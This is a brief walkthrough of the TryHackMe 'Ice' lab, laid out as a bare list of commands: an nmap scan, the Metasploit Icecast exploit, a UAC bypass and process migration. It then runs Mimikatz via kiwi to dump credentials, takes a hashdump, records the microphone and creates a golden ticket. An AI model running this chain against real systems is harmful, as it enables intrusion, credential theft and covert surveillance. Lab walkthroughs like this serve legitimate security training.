Ice

Room Link: https://tryhackme.com/room/ice

Recon

Kali

nmap -A $VICTIM

Kali

msfconsole

Metasploit

search icecast
use 0
set RHOSTS $VICTIM
run

Meterpreter

run post/multi/recon/local_exploit_suggester
background

Metasploit

use exploit/windows/local/bypassuac_eventvwr
set SESSIONS 1
set LHOST $KALI
run

We are still user dark but have a lot of privilege's now

Meterpreter

ps

Meterpreter

ps
migrate -N spoolsv.exe

Meterpreter

load kiwi
creds_all

Meterpreter

hashdump

Meterpreter

screenshare
record_mic
golden_ticket_create

Last updated 1 year ago